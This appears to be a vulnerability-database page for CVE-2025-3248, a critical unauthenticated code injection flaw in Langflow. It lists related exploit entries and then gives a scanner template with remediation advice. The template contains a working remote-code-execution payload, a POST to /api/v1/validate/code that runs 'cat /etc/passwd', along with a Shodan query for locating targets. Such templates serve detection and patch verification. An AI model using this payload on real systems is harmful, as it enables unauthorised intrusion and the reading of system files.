| Reporter | Title | Published | Views | Family All 73 |
|---|---|---|---|---|
| Exploit for Code Injection in Langflow | 13 May 202516:08 | – | githubexploit | |
| Exploit for Missing Authentication for Critical Function in Langflow | 24 Oct 202513:08 | – | githubexploit | |
| Exploit for Missing Authentication for Critical Function in Langflow | 20 Nov 202501:45 | – | githubexploit | |
| Exploit for Code Injection in Langflow | 29 Sep 202514:21 | – | githubexploit | |
| Exploit for Code Injection in Langflow | 19 Jun 202506:30 | – | githubexploit | |
| Exploit for Missing Authentication for Critical Function in Langflow | 20 Nov 202501:45 | – | githubexploit | |
| Exploit for Code Injection in Langflow | 16 Apr 202514:00 | – | githubexploit | |
| Exploit for Code Injection in Langflow | 18 Jun 202503:42 | – | githubexploit | |
| Exploit for Code Injection in Langflow | 23 Jun 202509:36 | – | githubexploit | |
| Exploit for Code Injection in Langflow | 22 Jun 202516:30 | – | githubexploit |
id: CVE-2025-3248
info:
name: Langflow AI - Unauthenticated Remote Code Execution
author: nvn1729
severity: critical
description: |
Langflow versions prior to 1.3.0 are susceptible to code injection in the /api/v1/validate/code endpoint.A remote and unauthenticated attacker can send crafted HTTP requests to execute arbitrary code.
impact: |
Unauthenticated attackers can execute arbitrary code through crafted POST requests to the /api/v1/validate/code endpoint, achieving complete server compromise.
remediation: |
Upgrade to Langflow version 1.3.0 or later that properly validates user input before passing it to code execution functions.
reference:
- https://github.com/langflow-ai/langflow/pull/6911
- https://github.com/langflow-ai/langflow/releases/tag/1.3.0
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2025-3248
cwe-id: CWE-306
epss-score: 0.99972
epss-percentile: 0.99978
metadata:
verified: true
max-request: 1
shodan-query: html:"Langflow"
tags: cve,cve2025,python,rce,injection,kev,langflow,vkev,vuln
http:
- raw:
- |
POST /api/v1/validate/code HTTP/1.1
Host: {{Hostname}}
Content-Type: application/json
{"code": "@exec('raise Exception(__import__(\"subprocess\").check_output([\"cat\", \"/etc/passwd\"]))')\ndef foo():\n pass"}
matchers-condition: and
matchers:
- type: regex
part: body
regex:
- "root:.*:0:0:"
- type: word
part: content_type
words:
- "application/json"
- type: status
status:
- 200
# digest: 490a004630440220674cfbf5f61d20fad602bdcbd0be7d66af1cdf7c58966445b6f3e36a7901b6340220550f67aa03a1b279309e6a0e21fceda2a0db6aa62629ce0bfaa6a93ccd775b8d:922c64590222798bb761d5b6d8e72950Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation